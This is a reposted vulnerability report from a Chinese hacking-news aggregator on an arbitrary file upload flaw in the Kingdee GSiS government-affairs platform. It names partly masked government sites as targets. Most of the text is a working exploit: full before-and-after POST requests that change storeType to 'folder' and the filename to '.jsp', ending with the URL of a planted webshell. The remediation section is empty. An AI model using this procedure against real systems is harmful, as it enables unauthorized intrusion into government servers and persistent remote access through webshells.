记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

金蝶政务GSiS服务平台通用上传漏洞

2014-10-21 02:10

问题:上传页面多数参数可控,导致任意文件上传,且有越权访问会员外功能问题。

收集到的案例有:

高平市政务中心

http://gk.sx******.gov.cn:8080/kdgs/

汉川政务中心

http://www.han****.gov.cn:8080/kdgs

等等

通杀所有金蝶GSIS

漏洞证明:

本次演示地址为:

http://gk.sx******.gov.cn:8080/kdgs

漏洞地址:http://gk.sx******.gov.cn:8080/kdgs/portal/share/upload/uploadFile.jsp

第一步:

注册并登录网站会员获取合法会话标识

注册地址

http://gk.sx******.gov.cn:8080/kdgs/biz/portal/user/regist.action?registUserType=

如果页面找不到注册按钮的可以直接替换页面找到注册地址。

第二步:

访问文件上传页面,利用burpsuite代理进行上传



正常上传POST请求为

code 区域
POST /kdgs/biz/portal/upload/upload.action HTTP/1.1

Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*

Referer: http://gk.sx******.gov.cn:8080/kdgs/portal/share/upload/uploadFile.jsp?path=ITEM_PATH&maximumSize=3145728&fileSaveMode=00&storeType=db&refreshTimestamp=1405994496640

Accept-Language: zh-cn

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)

Content-Type: multipart/form-data; boundary=---------------------------7def0302c2

Accept-Encoding: gzip, deflate

Host: gk.sx******.gov.cn:8080

Content-Length: 1502

Proxy-Connection: Keep-Alive

Pragma: no-cache

Cookie: JSESSIONID=B247935EBA2FB9FE9B4C4506A4646D45; __userType__cookie=INNER



-----------------------------7def0302c2

Content-Disposition: form-data; name="id"





-----------------------------7def0302c2

Content-Disposition: form-data; name="viewid"





-----------------------------7def0302c2

Content-Disposition: form-data; name="path"



ITEM_PATH

-----------------------------7def0302c2

Content-Disposition: form-data; name="fileSaveMode"



00

-----------------------------7def0302c2

Content-Disposition: form-data; name="uploadList_"





-----------------------------7def0302c2

Content-Disposition: form-data; name="fieldValue"





-----------------------------7def0302c2

Content-Disposition: form-data; name="allowedTypes"





-----------------------------7def0302c2

Content-Disposition: form-data; name="maximumSize"



3145728

-----------------------------7def0302c2

Content-Disposition: form-data; name="storeType"



db

-----------------------------7def0302c2

Content-Disposition: form-data; name="fieldid"





-----------------------------7def0302c2

Content-Disposition: form-data; name="file"; filename="3.gif"

Content-Type: image/gif



wooyun

-----------------------------7def0302c2

Content-Disposition: form-data; name="filename"



C:\fakepath\3.gif

-----------------------------7def0302c2

Content-Disposition: form-data; name="file"; filename=""

Content-Type: application/octet-stream





-----------------------------7def0302c2

Content-Disposition: form-data; name="filename"





-----------------------------7def0302c2--



修改storeType的值db为folder

修改filename的值为XX.jsp

2.png



修改后的POST数据包为

code 区域
POST /kdgs/biz/portal/upload/upload.action HTTP/1.1

Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*

Referer: http://gk.sx******.gov.cn:8080/kdgs/portal/share/upload/uploadFile.jsp?path=ITEM_PATH&maximumSize=3145728&fileSaveMode=00&storeType=db&refreshTimestamp=1405994496640

Accept-Language: zh-cn

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)

Content-Type: multipart/form-data; boundary=---------------------------7def0302c2

Accept-Encoding: gzip, deflate

Host: gk.sx******.gov.cn:8080

Content-Length: 1502

Proxy-Connection: Keep-Alive

Pragma: no-cache

Cookie: JSESSIONID=B247935EBA2FB9FE9B4C4506A4646D45; __userType__cookie=INNER



-----------------------------7def0302c2

Content-Disposition: form-data; name="id"





-----------------------------7def0302c2

Content-Disposition: form-data; name="viewid"





-----------------------------7def0302c2

Content-Disposition: form-data; name="path"



ITEM_PATH

-----------------------------7def0302c2

Content-Disposition: form-data; name="fileSaveMode"



00

-----------------------------7def0302c2

Content-Disposition: form-data; name="uploadList_"





-----------------------------7def0302c2

Content-Disposition: form-data; name="fieldValue"





-----------------------------7def0302c2

Content-Disposition: form-data; name="allowedTypes"





-----------------------------7def0302c2

Content-Disposition: form-data; name="maximumSize"



3145728

-----------------------------7def0302c2

Content-Disposition: form-data; name="storeType"



folder

-----------------------------7def0302c2

Content-Disposition: form-data; name="fieldid"





-----------------------------7def0302c2

Content-Disposition: form-data; name="file"; filename="3.gif"

Content-Type: image/gif



wooyun

-----------------------------7def0302c2

Content-Disposition: form-data; name="filename"



C:\fakepath\3.jsp

-----------------------------7def0302c2

Content-Disposition: form-data; name="file"; filename=""

Content-Type: application/octet-stream





-----------------------------7def0302c2

Content-Disposition: form-data; name="filename"





-----------------------------7def0302c2--



上传成功后得到

2214090909734adf55858a24ca2745e921f09f4c.png



webshell地址为

http://gk.sx******.gov.cn:8080/kdgs/uploads/item/11e4-1165-d78d7b5a-ba69-331a1d69f888.jsp



11e4-1165-d78d7b5a-ba69-331a1d69f888.jsp是随机的,看burpsuite回显。



22141009dd5c045a79425a4decd5bb2b0eeedd89.png

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2014-069300

阅读:109527 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“金蝶政务GSiS服务平台通用上传漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云